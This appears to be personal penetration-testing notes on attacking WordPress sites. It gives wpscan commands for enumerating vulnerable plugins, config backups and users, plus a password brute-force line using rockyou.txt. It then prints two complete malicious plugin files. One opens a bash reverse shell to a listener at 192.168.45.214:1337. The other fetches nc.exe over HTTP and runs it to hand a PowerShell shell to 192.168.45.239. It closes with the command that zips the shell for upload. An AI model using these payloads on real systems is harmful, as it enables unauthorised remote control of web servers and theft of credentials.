WordPress

wpscan --url $url 
wpscan --url $url -e vp     <- Vulnerable plugins
wpscan --url $url -e cb     <- Config backups
wpscan --url $url -e p --plugins-detection aggressive

wpscan --url $url -U users.txt -P ~/rockyou.txt

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.214/1337 0>&1'");
?>

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

system("powershell -c curl http://192.168.45.239/nc.exe -o C:\\programdata\\nc.exe");
system("C:\\programdata\\nc.exe 192.168.45.239 1337 -e powershell.exe");
?>

zip shell.zip shell.php